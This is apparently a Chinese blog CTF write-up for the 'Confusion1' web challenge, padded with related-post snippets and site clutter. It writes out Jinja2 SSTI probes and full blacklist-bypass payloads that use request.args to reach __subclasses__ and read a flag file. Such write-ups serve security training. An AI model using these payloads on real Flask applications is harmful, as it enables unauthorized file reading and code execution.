【攻防世界】Confusion1

已于 2024-04-09 16:46:26 修改
阅读量489 收藏 2
点赞数 8
文章标签: php 网络安全 安全 web安全
于 2024-04-09 16:45:15 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wangzhemvp/article/details/137555699
版权

php的标志是大象,Python的标志是蛇 。Python 的 Flask 框架( Flask 使用 Jinja2 作为模板引擎 )  

点进register.php

输入{{3*4}} 

输入 {{config}} 也有回显,ssti 

判断是否存在ssti注入:

1. {{8*8}}

2. {{config}} 

过滤了关键字,并未过滤request。

request 是 Flask 框架的一个全局对象 , 表示 " 当前请求的对象( flask.request ) " 。所以我们可以利用request.args绕过输入黑名单,进行沙箱逃逸。

{{''[request.args.a][request.args.b][2][request.args.c]()}}?a=__class__&b=__mro__&c=__subclasses__ 

{{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

 通过本道题,你要知道:

(1){{''[request.args.a][request.args.b][2][request.args.c]()[40]('/opt/flag_1de36dff62a3a54ecfbc6e1fd2ef0ad1.txt')[request.args.d]()}}?a=__class__&b=__mro__&c=__subclasses__&d=read

echo‘’wang
关注
  • 8
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
Edge Type Confusion利用1
08-03
介绍利用之前需要首先理解一下javascript中数组在解析引擎中的表现形式,我们知道javascript是一个弱类型的语言,其中的数组可以保存任意类型的数据。
ConFusion
03-19
ConFusion
攻防世界Confusion1
qq_43774856的博客
12-09 758
Confusion1 打开链接,如图所示 点击login,发现无法访问,查看一下源码,有flag的信息 看了题解后知道是SSTI 使用{{7*7}} 最常用的 {{''.__class__.__mro__[2].__subclasses__()}} 发现被过滤了 经过测试,过滤了很多关键字,如class,subclasses等。 这里使用request.args.t1且以GET方式提交t1=__class__来替换被过滤的__class__ {{''.__class__}} => {{''[
攻防世界 Confusion1
CyhDl666的博客
02-26 268
进入页面 index.php页面查看了源码,没有什么发现 进入Login.php页面 返回404??? 查看一下源码 从这里看可能是个SSTI模板注入 这里推荐个初学者的SSTI文章SSTI y 确定是SSTI模板注入 按照正常的注入流程{{''.__class__.__mro__}} 页面返回的是 从这里来看应该是存在一个过滤 想到做过的SSTI题目 shrine用的是url_for函数 尝试一下 ...
攻防世界----confusion1
qq_44418229的博客
07-22 1184
攻防世界----confusion1 如何确定是SSTI漏洞; 确定后要怎么绕过
攻防世界-Confusion1
m0_49025459的博客
02-14 603
访问题目场景某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器)然后结合图片我们知道,这个网址是python写的,那python语言书写的网址,存在最多的大概率是SSTI模板注入。
攻防世界web进阶区 Confusion1
akxnxbshai的博客
01-24 3590
攻防世界web进阶区 Confusion1 难度系数: 四星 题目来源: XCTF 4th-QCTF-2018 题目描述:某天,Bob说:PHP是最好的语言,但是Alice不赞同。所以Alice编写了这个网站证明。在她还没有写完的时候,我发现其存在问题。(请不要使用扫描器) 题目提到了php,打开网址首先看到一张图 蛇缠在大象身上猜测此系统使用了php+python (php的标志是大象,Python的标志是蛇) 然后进入了注册页面发现flag的位置 想到了本题可能存在Python ..
攻防世界--Confusion2
qq_46263951的博客
01-16 911
这个题是Confusion1的延续,所以根据题目提示,先在1中把salt文件内容先读出来 _Y0uW1llN3verKn0w1t_ 这里开放了register和login,注册并登陆 关于md5值爆破,我比较习惯使用数字来爆破,效率比较高一下 <?php $i=0; for ($i;$i<=9999999999999999;$i++) { if (substr(md5($i), 0, 6) == '7358dd') { echo($i); exi
攻防世界--Confusion1
m0_67467924的博客
05-30 260
a=__class__&b=__mro__&c=__subclasses__查找可以使用的基类,使用base报错,但是mro可以,我不懂,先做着吧{{''[request.args.a][request.args.b]}}?
攻防世界web进阶区 Confusion1 之request.args.key
snowlyzz的博客
05-12 631
又是一道新知识点的题收获很大,现在刷的webctf题都是要依靠大佬的wp,唉,还是太菜了。 刚进页面就蒙蔽了,什么都不知道。扫了一下目录和git 没有任何线索。。 看了下师傅们的WP。 点进去index。php 可以看到报错, 看到url url的信息会在页面上看到,猜测是ssTI注入 具体可以看:SSTI注入查看下源 FLAG文件显示出位置 一般来说 SSTI的注入payload都是 {{"".__class__.__mro__[2].__subclasses__()[4...
攻防世界 web confusion1
beihai2013
01-18 139
Confusion1 考察:SSTI 参考 https://www.cnblogs.com/zhengna/p/13964561.html 进入网页,发现除了主页面,login和register都登不进去。 显示apache2.4.10,查询是否有相关可利用漏洞,失败。 根据wp,login.php和register.php下均有提示flag位置(!!!一定要查看源码,不能访问的页面也要查看 在URL上测试 http://220.249.52.134:45205/index.php/{{ 1+1}} 返回
【愚公系列】2023年05月 攻防世界-WebConfusion1)
时光隧道
05-27 7795
SSTI漏洞(Server Side Template Injection,服务端模板注入漏洞)是一种 web 应用程序中的安全漏洞,它允许攻击者通过在模板中注入恶意代码,执行服务器端的任意代码。模板通常用于 web 应用程序中的动态内容生成,这些模板经常包含逻辑控制语句和变量插入。攻击者可以利用模板中缺乏输入验证和过滤来注入任意的代码,从而实现任意代码执行,甚至是远程命令执行。SSTI漏洞是一种危险性较高的漏洞,因为攻击者可以完全控制服务器端执行的代码和结果。
confusion
03-07
Create React App入门该项目是通过引导的。可用脚本在项目目录中,可以运行:npm start 在开发模式下运行应用程序。 打开在浏览器中查看它。 如果您进行编辑,则页面将重新加载。 您还将在控制台中看到任何棉绒错误...
Confusion
10-25
Confusion
confusion_matrix1.zip_confusion_matrix1_matlab混淆矩阵_混淆矩阵_混淆矩阵matl
07-15
可以用matlab来画混淆矩阵,很好用,还可以直观的显示分类的效果
如何同步管理1000个设备的VLAN数据?
weixin_68261415的博客
05-15 733
为了方便VLAN的配置和维护,可在部门A和部门B内分别部署VCMP,管理域分别为VCMP1和VCMP2,并选择汇聚交换机AGG1作为VCMP1的Sever,接入交换机ACC1~ACC2作为VCMP1的Client,汇聚交换机AGG2作为VCMP2的Server,接入交换机ACC3~ACC4作为VCMP2的Client。这样,只需在汇聚或核心交换机上创建、删除VLAN或修改VLAN的名称、描述,同域内的接入交换机会同步修改,进而实现VLAN的集中管理,降低配置和维护的工作量。
php centos选择sqlserver的驱动和扩展选择版本的说明
Z.X的博客
05-14 444
2023年2月23日13:41:48首先是php php扩展 驱动 数据库的关系 官方文档说明: https://learn.microsoft.com/zh-cn/sql/connect/php/step-1-configure-development-environment-for-php-development?view=sql-server-2017https://learn.microsoft.com/zh-cn/sql/connect/php/system-requirements-for-th
FebHost:为什么企业需要注册保加利亚.BG域名?
最新发布
05-16 375
品牌本土化战略的实施同样离不开.BG域名的助力。拥有.BG域名的企业可以显著提高其在来自保加利亚的搜索请求中的可见度和排名,吸引更多的目标访问者,提升用户参与度。在当今全球化的商业环境中,对于与保加利亚市场息息相关的企业而言,选择合适的域名至关重要。面对日益饱和的通用顶级域名市场,.BG提供了一个具有区域特色的替代选择,帮助企业在保加利亚市场中树立一个鲜明且难忘的网络形象。综上所述,对于志在保加利亚市场塑造坚实网络地位的企业、组织或个人而言,.BG域名是一个明智且具有战略意义的选择,值得业界关注和利用。
等保测评实体分享three
ddcajdkdl的博客
05-16 925
它除了检测自身的主机以外,根本不检测网络上的情况,而且对入侵行为分析的工作量将随着主机数量的增加而增加,因此全面部署主机入侵检测系统代价比较大,企业很难将所有主机用主机入侵检测系统保护,只能选择部分主机进行保护,那些未安装主机入侵检测系统的机器将成为保护的盲点,入侵者可利用这些机器达到攻击的目标。NIDS一般部署在比较重要的网段内,它不需要改变服务器等主机的配置,由于它不会在业务系统的主机中安装额外的软件,从而不会影响这些机器的CPU、I/O与磁盘等资源的使用,不会影响业务系统的性能。
confusion matrix
03-22
混淆矩阵是一种用于评估分类模型性能的表格,它将模型的预测结果与真实结果进行比较。混淆矩阵通常包括四个指标:真正例(True Positive)、假正例(False Positive)、真反例(True Negative)和假反例(False ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值